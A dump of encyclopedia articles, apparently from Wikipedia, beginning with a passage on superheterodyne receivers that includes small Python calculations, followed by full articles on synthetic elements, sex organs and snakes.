In some cases, a narrow-band receiver can have a fixed-tuned RF amplifier. In that case, only the local oscillator frequency is changed. In most cases, a receiver's input band is wider than its IF center frequency. For example, a typical AM broadcast band receiver covers 510 kHz to 1655 kHz (an input band of roughly 1145 kHz) with a 455 kHz IF frequency; an FM broadcast band receiver covers the 88 MHz to 108 MHz band with a 10.7 MHz IF frequency. In that situation, the RF amplifier must be tuned so the IF amplifier does not see two stations at the same time. If the AM broadcast band receiver LO were set at 1200 kHz, it would see stations at both 745 kHz (1200 − 455 kHz) and 1655 kHz (1200 + 455 kHz). Consequently, the RF stage must be designed so that any stations that are twice the IF frequency away are significantly attenuated. The tracking can be done with a multi-section variable capacitor or some varactors driven by a common control voltage. An RF amplifier may have tuned circuits at both its input and its output, so three or more tuned circuits may be tracked. In practice, the RF and LO frequencies need to track closely but not perfectly. In the days of tube (valve) electronics, it was common for superheterodyne receivers to combine the functions of the local oscillator and the mixer in a single tube, leading to a savings in power, size, and especially cost. A single pentagrid converter tube would oscillate and also provide signal amplification as well as frequency mixing. The mixer tube or transistor is sometimes called the first detector, while the demodulator that extracts the modulation from the IF signal is called the second detector. In a dual-conversion superhet there are two mixers, so the demodulator is called the third detector. IF amplifier The stages of an intermediate frequency amplifier ("IF amplifier" or "IF strip") are tuned to a fixed frequency that does not change as the receiving frequency changes. The fixed frequency simplifies optimization of the IF amplifier. The IF amplifier is selective around its center frequency fIF. The fixed center frequency allows the stages of the IF amplifier to be carefully tuned for best performance (this tuning is called "aligning" the IF amplifier). If the center frequency changed with the receiving frequency, then the IF stages would have to track their tuning. That is not the case with the superheterodyne. Normally, the IF center frequency fIF is chosen to be less than the range of desired reception frequencies fRF. That is because it is easier and less expensive to get high selectivity at a lower frequency using tuned circuits. The bandwidth of a tuned circuit with a certain Q is proportional to the frequency itself (and what's more, a higher Q is achievable at lower frequencies), so fewer IF filter stages are required to achieve the same selectivity. Also, it is easier and less expensive to get high gain at lower frequencies. However, in many modern receivers designed for reception over a wide frequency range (e.g. scanners and spectrum analyzers) a first IF frequency higher than the reception frequency is employed in a double-conversion configuration. For instance, the Rohde & Schwarz EK-070 VLF/HF receiver covers 10 kHz to 30 MHz. It has a band-switched RF filter and mixes the input to a first IF of 81.4 MHz and a second IF frequency of 1.4 MHz. The first LO frequency is 81.4 to 111.4 MHz, a reasonable range for an oscillator.
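The selectivity argument can be made quantitative: a single tuned circuit's −3 dB bandwidth is BW = f0/Q, so for a fixed achievable Q the bandwidth shrinks in proportion to the center frequency. A quick sketch (the Q value is an assumed, typical-order figure, not a quoted specification):

```python
def tuned_circuit_bandwidth_hz(f0_hz: float, q: float) -> float:
    """-3 dB bandwidth of a single tuned circuit: BW = f0 / Q."""
    return f0_hz / q

Q = 100.0  # assumed, typical order of magnitude for an LC circuit

# At a 455 kHz IF one circuit gives ~4.6 kHz of selectivity,
# while at a 10.7 MHz IF the same Q yields ~107 kHz.
print(tuned_circuit_bandwidth_hz(455e3, Q))   # 4550.0
print(tuned_circuit_bandwidth_hz(10.7e6, Q))  # 107000.0
```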
But if the original RF range of the receiver were to be converted directly to the 1.4 MHz intermediate frequency, the LO frequency would need to cover 1.4–31.4 MHz, which cannot be accomplished using tuned circuits (a variable capacitor with a fixed inductor would need a capacitance range of 500:1). Image rejection is never an issue with such a high IF frequency. The first IF stage uses a crystal filter with a 12 kHz bandwidth. There is a second frequency conversion (making this a double-conversion receiver) that mixes the 81.4 MHz first IF with 80 MHz to create a 1.4 MHz second IF. Image rejection for the second IF is not an issue, as the first IF has a bandwidth of much less than 2.8 MHz. To avoid interference to receivers, licensing authorities will avoid assigning common IF frequencies to transmitting stations. Standard intermediate frequencies used are 455 kHz for medium-wave AM radio, 10.7 MHz for broadcast FM receivers, 38.9 MHz (Europe) or 45 MHz (US) for television, and 70 MHz for satellite and terrestrial microwave equipment. To avoid tooling costs, most manufacturers tended to design their receivers around the fixed range of frequencies for which such components were offered, which resulted in a worldwide de facto standardization of intermediate frequencies. In early superhets, the IF stage was often a regenerative stage providing the sensitivity and selectivity with fewer components. Such superhets were called super-gainers or regenerodynes. The technique is also called a Q multiplier, involving a small modification to an existing receiver, especially for the purpose of increasing selectivity. IF bandpass filter The IF stage includes a filter and/or multiple tuned circuits to achieve the desired selectivity. This filtering must have a bandpass equal to or less than the frequency spacing between adjacent broadcast channels. Ideally a filter would have a high attenuation to adjacent channels, but maintain a flat response across the desired signal spectrum in order to retain the quality of the received signal. This may be obtained using one or more dual-tuned IF transformers, a quartz crystal filter, or a multipole ceramic crystal filter. In the case of television receivers, no other technique was able to produce the precise bandpass characteristic needed for vestigial sideband reception, such as that used in the NTSC system first approved by the US in 1941. By the 1980s, multi-component capacitor-inductor filters had been replaced with precision electromechanical surface acoustic wave (SAW) filters. Fabricated by precision laser milling techniques, SAW filters are cheaper to produce, can be made to extremely close tolerances, and are very stable in operation. Demodulator The received signal is now processed by the demodulator stage, where the audio signal (or other baseband signal) is recovered and then further amplified. AM demodulation requires envelope detection, which can be achieved by means of rectification and a low-pass filter (which can be as simple as an RC circuit) to remove remnants of the intermediate frequency. FM signals may be detected using a discriminator, ratio detector, or phase-locked loop. Continuous wave and single sideband signals require a product detector using a so-called beat frequency oscillator, and there are other techniques used for different types of modulation. The resulting audio signal (for instance) is then amplified and drives a loudspeaker.
When so-called high-side injection is used, where the local oscillator is at a higher frequency than the received signal (as is common), the frequency spectrum of the original signal is reversed. This must be taken into account by the demodulator (and in the IF filtering) in the case of certain types of modulation such as single sideband. Multiple conversion To overcome obstacles such as image response, some receivers use multiple successive stages of frequency conversion and multiple IFs of different values. A receiver with two frequency conversions and IFs is called a dual-conversion superheterodyne, and one with three IFs is called a triple-conversion superheterodyne. The main reason that this is done is that with a single IF there is a tradeoff between low image response and selectivity. The separation between the received frequency and the image frequency is equal to twice the IF frequency, so the higher the IF, the easier it is to design an RF filter to remove the image frequency from the input and achieve low image response. However, the higher the IF, the more difficult it is to achieve high selectivity in the IF filter. At shortwave frequencies and above, the difficulty in obtaining sufficient selectivity in the tuning with the high IFs needed for low image response impacts performance. To solve this problem two IF frequencies can be used, first converting the input frequency to a high IF to achieve low image response, and then converting this frequency to a low IF to achieve good selectivity in the second IF filter. To improve tuning, a third IF can be used. For example, for a receiver that can tune from 500 kHz to 30 MHz, three frequency converters might be used. With a 455 kHz IF it is easy to get adequate front-end selectivity with broadcast band (under 1600 kHz) signals. For example, if the station being received is on 600 kHz, the local oscillator can be set to 1055 kHz, giving an IF of (1055 − 600 =) 455 kHz. But a station on 1510 kHz could also potentially produce an image at (1510 − 1055 =) 455 kHz and so cause image interference. However, because 600 kHz and 1510 kHz are so far apart, it is easy to design the front-end tuning to reject the 1510 kHz frequency. However, at 30 MHz, things are different. The oscillator would be set to 30.455 MHz to produce a 455 kHz IF, but a station on 30.910 MHz would also produce a 455 kHz beat, so both stations would be heard at the same time. But it is virtually impossible to design an RF tuned circuit that can adequately discriminate between 30 MHz and 30.91 MHz, so one approach is to "bulk downconvert" whole sections of the shortwave bands to a lower frequency, where adequate front-end tuning is easier to arrange. For example, the ranges 29 MHz to 30 MHz, 28 MHz to 29 MHz, etc. might be converted down to 2 MHz to 3 MHz, where they can be tuned more conveniently. This is often done by first converting each "block" up to a higher frequency (typically 40 MHz) and then using a second mixer to convert it down to the 2 MHz to 3 MHz range. The 2 MHz to 3 MHz "IF" is basically another self-contained superheterodyne receiver, most likely with a standard IF of 455 kHz. Modern designs Microprocessor technology allows replacing the superheterodyne receiver design by a software-defined radio architecture, where the IF processing after the initial IF filter is implemented in software.
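The block-downconversion scheme above can be checked with a short script. This is only a sketch under stated assumptions: the two fixed LO frequencies (70 MHz and 38 MHz) are illustrative choices that map the 29–30 MHz block up through roughly 40 MHz and back down to 2–3 MHz, not the values of any particular receiver:

```python
def block_downconvert(f_rf_mhz: float) -> float:
    """Two-conversion plan of the kind sketched in the text:
    up to ~40 MHz, then down to the 2-3 MHz tuning range.

    LO choices (70 MHz and 38 MHz) are assumed illustrative values.
    """
    first_if = 70.0 - f_rf_mhz     # 29-30 MHz block lands at 40-41 MHz
    second_if = first_if - 38.0    # then at 2-3 MHz, where tuning is easy
    return second_if

for f in (29.0, 29.5, 30.0):
    print(f, "->", block_downconvert(f))   # 3.0, 2.5, 2.0 MHz
```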
This technique is already in use in certain designs, such as very low-cost FM radios incorporated into mobile phones, since the system already has the necessary microprocessor. Radio transmitters may also use a mixer stage to produce an output frequency, working more or less as the reverse of a superheterodyne receiver. Advantages and disadvantages Superheterodyne receivers have essentially replaced all previous receiver designs. The development of modern semiconductor electronics negated the advantages of designs (such as the regenerative receiver) that used fewer vacuum tubes. The superheterodyne receiver offers superior sensitivity, frequency stability and selectivity. Compared with the tuned radio frequency receiver (TRF) design, superhets offer better stability because a tuneable oscillator is more easily realized than a tuneable amplifier. Operating at a lower frequency, IF filters can give narrower passbands at the same Q factor than an equivalent RF filter. A fixed IF also allows the use of a crystal filter or similar technologies that cannot be tuned. Regenerative and super-regenerative receivers offered a high sensitivity, but often suffered from stability problems, making them difficult to operate. Although the advantages of the superhet design are overwhelming, there are a few drawbacks that need to be tackled in practice. Image frequency (fIMAGE) One major disadvantage to the superheterodyne receiver is the problem of image frequency. In heterodyne receivers, an image frequency is an undesired input frequency equal to the station frequency plus (or minus) twice the intermediate frequency. The image frequency results in two stations being received at the same time, thus producing interference. Reception at the image frequency can be combated through tuning (filtering) at the antenna and RF stage of the superheterodyne receiver. For example, an AM broadcast station at 580 kHz is tuned on a receiver with a 455 kHz IF. The local oscillator is tuned to 1035 kHz. But a signal at 1490 kHz is also 455 kHz away from the local oscillator; so both the desired signal and the image, when mixed with the local oscillator, will appear at the intermediate frequency. This image frequency is within the AM broadcast band. Practical receivers have a tuning stage before the converter, to greatly reduce the amplitude of image frequency signals; additionally, broadcasting stations in the same area have their frequencies assigned to avoid such images. The unwanted frequency is called the image of the wanted frequency, because it is the "mirror image" of the desired frequency reflected about fLO. A receiver with inadequate filtering at its input will pick up signals at two different frequencies simultaneously: the desired frequency and the image frequency. A radio reception that happens to be at the image frequency can interfere with reception of the desired signal, and noise (static) around the image frequency can decrease the receiver's signal-to-noise ratio (SNR) by up to 3 dB. Early autodyne receivers typically used IFs of only 150 kHz or so. As a consequence, most autodyne receivers required greater front-end selectivity, often involving double-tuned coils, to avoid image interference. With the later development of tubes able to amplify well at higher frequencies, higher IF frequencies came into use, reducing the problem of image interference. Typical consumer radio receivers have only a single tuned circuit in the RF stage.
Sensitivity to the image frequency can be minimized only by (1) a filter that precedes the mixer or (2) a more complex mixer circuit that suppresses the image, though this is rarely used. In most tunable receivers using a single IF frequency, the RF stage includes at least one tuned circuit in the RF front end whose tuning is performed in tandem with the local oscillator. In double (or triple) conversion receivers in which the first conversion uses a fixed local oscillator, this may rather be a fixed bandpass filter that accommodates the frequency range being mapped to the first IF frequency range. Image rejection is an important factor in choosing the intermediate frequency of a receiver. The farther apart the bandpass frequency and the image frequency are, the more the bandpass filter will attenuate any interfering image signal. Since the frequency separation between the bandpass and the image frequency is 2fIF, a higher intermediate frequency improves image rejection. It may be possible to use a high enough first IF that a fixed-tuned RF stage can reject any image signals. The ability of a receiver to reject interfering signals at the image frequency is measured by the image rejection ratio. This is the ratio (in decibels) of the output of the receiver from a signal at the received frequency, to its output for an equal-strength signal at the image frequency. Local oscillator radiation It can be difficult to keep stray radiation from the local oscillator below the level that a nearby receiver can detect. If the receiver's local oscillator can reach the antenna, it will act as a low-power CW transmitter. Consequently, what is meant to be a receiver can itself create radio interference. In intelligence operations, local oscillator radiation gives a means to detect a covert receiver and its operating frequency. The method was used by MI5 during Operation RAFTER. This same technique is also used in radar detector detectors used by traffic police in jurisdictions where radar detectors are illegal. Local oscillator radiation is most prominent in receivers in which the antenna signal is connected directly to the mixer (which itself receives the local oscillator signal) rather than in receivers in which an RF amplifier stage is used in between. Thus it is more of a problem with inexpensive receivers and with receivers at such high frequencies (especially microwave) where RF amplifying stages are difficult to implement. Local oscillator sideband noise Local oscillators typically generate a single-frequency signal that has negligible amplitude modulation but some random phase modulation, which spreads some of the signal's energy into sideband frequencies. That causes a corresponding widening of the receiver's frequency response, which would defeat the aim of making a very narrow-bandwidth receiver, such as one for receiving low-rate digital signals. Care needs to be taken to minimize oscillator phase noise, usually by ensuring that the oscillator never enters a non-linear mode.
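The image rejection ratio defined in this section is a plain decibel ratio of the receiver's outputs for the two equal-strength inputs; a minimal sketch (hypothetical function name, output powers assumed as inputs):

```python
import math

def image_rejection_ratio_db(p_wanted_w: float, p_image_w: float) -> float:
    """Image rejection ratio: receiver output for the wanted signal versus an
    equal-strength signal at the image frequency, expressed in decibels."""
    return 10 * math.log10(p_wanted_w / p_image_w)

# If the image produces 1/10000 of the wanted signal's output power,
# the receiver has 40 dB of image rejection.
print(image_rejection_ratio_db(1.0, 1e-4))   # 40.0
```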
Technology
Broadcasting
null
29365
https://en.wikipedia.org/wiki/Synthetic%20element
Synthetic element
A synthetic element is one of 24 known chemical elements that do not occur naturally on Earth: they have been created by human manipulation of fundamental particles in a nuclear reactor, a particle accelerator, or the explosion of an atomic bomb; thus, they are called "synthetic", "artificial", or "man-made". The synthetic elements are those with atomic numbers 95–118, as shown in purple on the accompanying periodic table: these 24 elements were first created between 1944 and 2010. The mechanism for the creation of a synthetic element is to force additional protons into the nucleus of an element with an atomic number lower than 95. All known synthetic elements are unstable (see: island of stability), but they decay at widely varying rates; the half-lives of their longest-lived isotopes range from microseconds to millions of years. Five more elements that were first created artificially are strictly speaking not synthetic, because they were later found in nature in trace quantities: 43Tc, 61Pm, 85At, 93Np, and 94Pu; they are nonetheless sometimes classified as synthetic alongside the exclusively artificial elements. The first of these, technetium, was created in 1937. Plutonium (Pu, atomic number 94), first synthesized in 1940, is another such element. It is the element with the largest number of protons (atomic number) to occur in nature, but it does so in such tiny quantities that it is far more practical to synthesize it. Plutonium is known mainly for its use in atomic bombs and nuclear reactors. No elements with atomic numbers greater than 99 have any uses outside of scientific research, since they have extremely short half-lives and thus have never been produced in large quantities. Properties All elements with an atomic number greater than 94 decay quickly enough into lighter elements that any atoms of these elements that may have existed when the Earth formed (about 4.6 billion years ago) have long since decayed. Synthetic elements now present on Earth are the product of atomic bombs or experiments that involve nuclear reactors or particle accelerators, via nuclear fusion or neutron absorption. The atomic mass for natural elements is based on the weighted average abundance of natural isotopes in Earth's crust and atmosphere. For synthetic elements, there is no "natural isotope abundance". Therefore, for synthetic elements the total nucleon count (protons plus neutrons) of the most stable isotope (i.e., the isotope with the longest half-life) is listed in brackets as the atomic mass. History Technetium The first element to be synthesized, rather than discovered in nature, was technetium in 1937. This discovery filled a gap in the periodic table, and the fact that technetium has no stable isotopes explains its natural absence on Earth (and the gap). With the longest-lived isotope of technetium, 97Tc, having a 4.21-million-year half-life, no technetium remains from the formation of the Earth. Only minute traces of technetium occur naturally in Earth's crust—as a product of spontaneous fission of 238U, or from neutron capture in molybdenum—but technetium is present naturally in red giant stars. Curium The first entirely synthetic element to be made was curium, synthesized in 1944 by Glenn T. Seaborg, Ralph A. James, and Albert Ghiorso by bombarding plutonium with alpha particles. Eight others Synthesis of americium, berkelium, and californium followed soon after.
Einsteinium and fermium were discovered by a team of scientists led by Albert Ghiorso in 1952 while studying the composition of radioactive debris from the detonation of the first hydrogen bomb. The isotopes synthesized were einsteinium-253, with a half-life of 20.5 days, and fermium-255, with a half-life of about 20 hours. The creation of mendelevium, nobelium, and lawrencium followed. Rutherfordium and dubnium During the height of the Cold War, teams from the Soviet Union and the United States independently created rutherfordium and dubnium. The naming and credit for the synthesis of these elements remained unresolved for many years, but eventually shared credit was recognized by IUPAC/IUPAP in 1992. In 1997, IUPAC decided to give dubnium its current name, honoring the city of Dubna, where the Russian team worked, since American-chosen names had already been used for many existing synthetic elements, while the name rutherfordium (chosen by the American team) was accepted for element 104. The last thirteen Meanwhile, the American team had created seaborgium, and the next six elements were created by a German team: bohrium, hassium, meitnerium, darmstadtium, roentgenium, and copernicium. Element 113, nihonium, was created by a Japanese team; the last five known elements, flerovium, moscovium, livermorium, tennessine, and oganesson, were created by Russian–American collaborations and complete the seventh row of the periodic table. List of synthetic elements The following elements do not occur naturally on Earth. All are transuranium elements and have atomic numbers of 95 and higher. Other elements usually produced through synthesis All elements with atomic numbers 1 through 94 occur naturally at least in trace quantities, but the following elements are often produced through synthesis. Technetium, promethium, astatine, neptunium, and plutonium were discovered through synthesis before being found in nature.
Physical sciences
Chemical element groups
null
29369
https://en.wikipedia.org/wiki/Sex%20organ
Sex organ
A sex organ, also known as a reproductive organ, is a part of an organism that is involved in sexual reproduction. Sex organs constitute the primary sex characteristics of an organism. Sex organs are responsible for producing and transporting gametes, as well as facilitating fertilization and supporting the development and birth of offspring. Sex organs are found in many species of animals and plants, with their features varying depending on the species. Sex organs are typically differentiated into male and female types. In animals (including humans), the male sex organs include the testicles, epididymides, and penis; the female sex organs include the clitoris, ovaries, oviducts, and vagina. The testicle in the male and the ovary in the female are called the primary sex organs. All other sex-related organs are known as secondary sex organs. The outer parts are known as the genitals or external genitalia, visible at birth in both sexes, while the inner parts are referred to as internal genitalia, which, in both sexes, are always hidden. In plants, male reproductive structures include stamens in flowering plants, which produce pollen. Female reproductive structures, such as pistils in flowering plants, produce ovules and receive pollen for fertilization. Mosses, ferns, and some similar plants have gametangia for reproductive organs, which are part of the gametophyte. The flowers of flowering plants produce pollen and egg cells, but the sex organs themselves are inside the gametophytes within the pollen and the ovule. Coniferous plants likewise produce their sexually reproductive structures within the gametophytes contained within the cones and pollen. The cones and pollen are not themselves sexual organs. Together, the sex organs constitute an organism's reproductive system. Terminology The primary sex organs are the gonads, a pair of internal sex organs, which diverge into testicles following male development or into ovaries following female development. As primary sex organs, gonads generate reproductive gametes containing inheritable DNA. They also produce most of the primary hormones that affect sexual development, and regulate other sexual organs and sexually differentiated behaviors. Secondary sex organs are the rest of the reproductive system, whether internal or external. The Latin term genitalia, sometimes anglicized as genitals, is used to describe the externally visible sex organs. In general zoology, given the great variety in organs, physiologies, and behaviors involved in copulation, male genitalia are more strictly defined as "all male structures that are inserted in the female or that hold her near her gonopore during sperm transfer"; female genitalia are defined as "those parts of the female reproductive tract that make direct contact with male genitalia or male products (sperm, spermatophores) during or immediately after copulation". Evolution It is hard to find a common origin for gonads; they most likely evolved independently several times. Testes and ovaries initially evolved due to natural selection. A consensus has emerged that sexual selection represents a primary factor in genital evolution. Male genitalia show traits of divergent evolution that are driven by sexual selection. Animals Vertebrates Mammals The visible portion of eutherian mammalian genitals for males consists of the penis and scrotum; for females, it consists of the vulva.
In placental mammals, females have two genital orifices, the vaginal and urethral openings, while males have one genital orifice in the penis, where urine and semen exit the urethra during urination and ejaculation. Male and female genitals have many nerve endings, making them highly sensitive to pleasurable touch. In most human societies, particularly in conservative ones, exposure of the genitals is considered public indecency. In humans, the sex organs include the external genitalia (the penis and scrotum in males, the vulva in females) and the internal genitalia described above. Development In typical prenatal development, sex organs originate from a common primordium during early gestation and differentiate into male or female sexes. The SRY gene, usually located on the Y chromosome and encoding the testis-determining factor, determines the direction of the differentiation. In its absence, the gonads continue to develop into ovaries. The development of the internal and external reproductive organs is determined by hormones produced by certain fetal gonads (ovaries or testicles) and the cells' response to them. The initial appearance of the fetal genitalia looks female-like: a pair of urogenital folds with a small protuberance in the middle, and the urethra behind the protuberance. If the fetus has testes, and the testes produce testosterone, and if the cells of the genitals respond to the testosterone, the outer urogenital folds swell and fuse in the midline to produce the scrotum; the protuberance grows larger and straighter to form the penis; the inner urogenital swellings grow, wrap around the penis, and fuse in the midline to form the penile raphe. Each organ/body part in one sex has a homologous counterpart in the other. The process of sexual differentiation includes the development of secondary sexual characteristics, such as patterns of pubic and facial hair and female breasts, that emerge at puberty. Because of the strong sexual selection affecting the structure and function of genitalia, they form an organ system that evolves rapidly. A great variety of genital form and function may therefore be found among animals. Other animals In many other vertebrates, a single posterior orifice (the cloaca) serves as the only opening for the reproductive, digestive, and urinary tracts (if present) in both sexes. All amphibians, birds, reptiles, some fish, and a few mammals (monotremes, tenrecs, golden moles, and marsupial moles) have this orifice, from which they excrete both urine and feces in addition to serving reproductive functions. Excretory systems with an analogous purpose in certain invertebrates are also sometimes referred to as cloacae. Penile and clitoral structures are present in some birds and many reptiles. The sex of teleost fish is determined by the shape of a fleshy tube behind the anus known as the genital papilla. Invertebrates Insects The organs concerned with insect mating and the deposition of eggs are known collectively as the external genitalia, although they may be largely internal; their components are very diverse in form. Slugs and snails The reproductive system of gastropods (slugs and snails) varies greatly from one group to another. Planaria Planaria are flatworms widely used in biological research. There are sexual and asexual planaria. Sexual planaria are hermaphrodites, possessing both testicles and ovaries. Each planarian delivers its secretion to the other, both giving and receiving sperm. Plants In most plant species, an individual has both male and female sex organs (a hermaphrodite).
The life cycle of land plants involves alternation of generations between a sporophyte and a haploid gametophyte. The gametophyte produces sperm or egg cells by mitosis. The sporophyte produces spores by meiosis, which in turn develop into gametophytes. Any sex organs that are produced by the plant will develop on the gametophyte. The seed plants, which include conifers and flowering plants, have small gametophytes that develop inside the pollen grains (male) and the ovule (female). Flowers In flowering plants, the flowers contain the sex organs. Sexual reproduction in flowering plants involves the union of the male and female germ cells, sperm and egg cells respectively. Pollen is produced in stamens and is carried to the pistil or carpel, which has the ovule at its base, where fertilization can take place. Within each pollen grain is a male gametophyte, which consists of only three cells. In most flowering plants, the female gametophyte within the ovule consists of only seven cells. Thus there are no sex organs as such. Fungi The sex organs in fungi are known as gametangia. In some fungi, the organs are indistinguishable from each other, but in other cases male and female sex organs are clearly different. Gametangia that are similar in appearance are known as isogametangia, while morphologically distinct male and female gametangia, which occur in the majority of fungi, are known as heterogametangia.
Biology and health sciences
Reproductive system
null
29370
https://en.wikipedia.org/wiki/Snake
Snake
Snakes are elongated limbless reptiles of the suborder Serpentes. Cladistically squamates, snakes are ectothermic, amniote vertebrates covered in overlapping scales, much like other members of the group. Many species of snakes have skulls with several more joints than their lizard ancestors and relatives, enabling them to swallow prey much larger than their heads (cranial kinesis). To accommodate their narrow bodies, snakes' paired organs (such as kidneys) appear one in front of the other instead of side by side, and most have only one functional lung. Some species retain a pelvic girdle with a pair of vestigial claws on either side of the cloaca. Lizards have independently evolved elongate bodies without limbs or with greatly reduced limbs at least twenty-five times via convergent evolution, leading to many lineages of legless lizards. These resemble snakes, but several common groups of legless lizards have eyelids and external ears, which snakes lack, although this rule is not universal (see Amphisbaenia, Dibamidae, and Pygopodidae). Living snakes are found on every continent except Antarctica, and on most smaller land masses; exceptions include some large islands, such as Ireland, Iceland, Greenland, and the islands of New Zealand, as well as many small islands of the Atlantic and central Pacific oceans. Additionally, sea snakes are widespread throughout the Indian and Pacific oceans. Around thirty families are currently recognized, comprising about 520 genera and about 3,900 species. They range in size from the tiny Barbados threadsnake, about 10 cm (4 in) long, to the reticulated python, which can reach about 6.95 m (22.8 ft) in length. The fossil species Titanoboa cerrejonensis was about 12.8 m (42 ft) long. Snakes are thought to have evolved from either burrowing or aquatic lizards, perhaps during the Jurassic period, with the earliest known fossils dating to between 143 and 167 Ma ago. The diversity of modern snakes appeared during the Paleocene epoch (c. 66 to 56 Ma ago, after the Cretaceous–Paleogene extinction event). The oldest preserved descriptions of snakes can be found in the Brooklyn Papyrus. Most species of snake are nonvenomous, and those that have venom use it primarily to kill and subdue prey rather than for self-defense. Some possess venom that is potent enough to cause painful injury or death to humans. Nonvenomous snakes either swallow prey alive or kill by constriction. Etymology The English word snake comes from Old English snaca, itself from Proto-Germanic *snak-an- (cf. German Schnake 'ring snake', Swedish snok 'grass snake'), from the Proto-Indo-European root *(s)nēg-o- 'to crawl, to creep', which also gave sneak as well as Sanskrit nāgá 'snake'. The word ousted adder, as adder went on to narrow in meaning, though in Old English næddre was the general word for snake. The other term, serpent, is from French, ultimately from Indo-European *serp- 'to creep', which also gave Ancient Greek hérpō 'I crawl' and Sanskrit sarpá 'snake'. Taxonomy All modern snakes are grouped within the suborder Serpentes in Linnean taxonomy, part of the order Squamata, though their precise placement within squamates remains controversial. The two infraorders of Serpentes are Alethinophidia and Scolecophidia. This separation is based on morphological characteristics and mitochondrial DNA sequence similarity. Alethinophidia is sometimes split into Henophidia and Caenophidia, with the latter consisting of "colubroid" snakes (colubrids, vipers, elapids, hydrophiids, and atractaspids) and acrochordids, while the other alethinophidian families comprise Henophidia.
Though now extinct, the Madtsoiidae, a family of giant, primitive, python-like snakes, survived until about 50,000 years ago in Australia, represented by genera such as Wonambi. Recent molecular studies support the monophyly of the clades of modern snakes, scolecophidians, typhlopids + anomalepidids, alethinophidians, core alethinophidians, uropeltids (Cylindrophis, Anomochilus, uropeltines), macrostomatans, booids, boids, pythonids and caenophidians. Families Legless lizards While snakes are limbless reptiles, evolved from (and grouped with) lizards, there are many other species of lizards that have lost their limbs independently but which superficially look similar to snakes. These include the slowworm, glass snake, and amphisbaenians. Evolution The fossil record of snakes is relatively poor because snake skeletons are typically small and fragile, making fossilization uncommon. Fossils readily identifiable as snakes (though often retaining hind limbs) first appear in the fossil record during the Cretaceous period. The earliest known true snake fossils (members of the crown group Serpentes) come from the marine simoliophiids, the oldest of which is the Late Cretaceous (Cenomanian age) Haasiophis terrasanctus from the West Bank, dated to between 112 and 94 million years old. Based on genomic analysis, it is certain that snakes descend from lizards. This conclusion is also supported by comparative anatomy and the fossil record. Pythons and boas—primitive groups among modern snakes—have vestigial hind limbs: tiny, clawed digits known as anal spurs, which are used to grasp during mating. The families Leptotyphlopidae and Typhlopidae also possess remnants of the pelvic girdle, appearing as horny projections when visible. Front limbs are nonexistent in all known snakes. This is caused by the evolution of their Hox genes, which control limb morphogenesis. The axial skeleton of the snakes' common ancestor, like most other tetrapods, had regional specializations consisting of cervical (neck), thoracic (chest), lumbar (lower back), sacral (pelvic), and caudal (tail) vertebrae. Early in snake evolution, the Hox gene expression in the axial skeleton responsible for the development of the thorax became dominant. As a result, the vertebrae anterior to the hindlimb buds (when present) all have the same thoracic-like identity (except for the atlas, axis, and 1–3 neck vertebrae). In other words, most of a snake's skeleton is an extremely extended thorax. Ribs are found exclusively on the thoracic vertebrae. Neck, lumbar and pelvic vertebrae are very reduced in number (only 2–10 lumbar and pelvic vertebrae are present), while only a short tail remains of the caudal vertebrae. However, the tail is still long enough to be of important use in many species, and is modified in some aquatic and tree-dwelling species. Many modern snake groups originated during the Paleocene, alongside the adaptive radiation of mammals following the extinction of (non-avian) dinosaurs. The expansion of grasslands in North America also led to an explosive radiation among snakes. Previously, snakes were a minor component of the North American fauna, but during the Miocene, the number of species and their prevalence increased dramatically with the first appearances of vipers and elapids in North America and the significant diversification of Colubridae (including the origin of many modern genera such as Nerodia, Lampropeltis, Pituophis, and Pantherophis).
Fossils There is fossil evidence to suggest that snakes may have evolved from burrowing lizards during the Cretaceous Period. An early fossil snake relative, Najash rionegrina, was a two-legged burrowing animal with a sacrum, and was fully terrestrial. Najash, which lived 95 million years ago, also had a skull with several features typical of lizards, but had evolved some of the mobile skull joints that define the flexible skull of most modern snakes. The species did not show any resemblance to the modern burrowing blind snakes, which have often been seen as the most primitive group of extant forms. One extant analog of these putative ancestors is the earless monitor Lanthanotus of Borneo (though it is also semiaquatic). Subterranean species evolved bodies streamlined for burrowing, and eventually lost their limbs. According to this hypothesis, features such as the transparent, fused eyelids (brille) and loss of external ears evolved to cope with fossorial difficulties, such as scratched corneas and dirt in the ears. Some primitive snakes are known to have possessed hindlimbs, but their pelvic bones lacked a direct connection to the vertebrae. These include fossil species like Haasiophis, Pachyrhachis and Eupodophis, which are slightly older than Najash. This hypothesis was strengthened in 2015 by the discovery of a 113-million-year-old fossil of a four-legged snake in Brazil that has been named Tetrapodophis amplectus. It has many snake-like features, is adapted for burrowing, and its stomach contents indicate that it preyed on other animals. It is currently uncertain whether Tetrapodophis is a snake or another squamate, as a snake-like body has independently evolved at least 26 times within the order. Tetrapodophis does not have distinctive snake features in its spine and skull. A study in 2021 places the animal in a group of extinct marine lizards from the Cretaceous period known as dolichosaurs, not directly related to snakes. An alternative hypothesis, based on morphology, suggests the ancestors of snakes were related to mosasaurs—extinct aquatic reptiles from the Cretaceous—forming the clade Pythonomorpha. According to this hypothesis, the fused, transparent eyelids of snakes are thought to have evolved to combat marine conditions (corneal water loss through osmosis), and the external ears were lost through disuse in an aquatic environment. This ultimately led to an animal similar to today's sea snakes. In the Late Cretaceous, snakes recolonized land and continued to diversify into today's snakes. Fossilized snake remains are known from early Late Cretaceous marine sediments, which is consistent with this hypothesis; particularly so, as they are older than the terrestrial Najash rionegrina. Similar skull structure, reduced or absent limbs, and other anatomical features found in both mosasaurs and snakes lead to a positive cladistic correlation, although some of these features are shared with varanids. Genetic studies in recent years have indicated snakes are not as closely related to monitor lizards as was once believed—and therefore not to mosasaurs, the proposed ancestor in the aquatic scenario of their evolution. However, more evidence links mosasaurs to snakes than to varanids. Fragmented remains found from the Jurassic and Early Cretaceous indicate deeper fossil records for these groups, which may potentially refute either hypothesis.
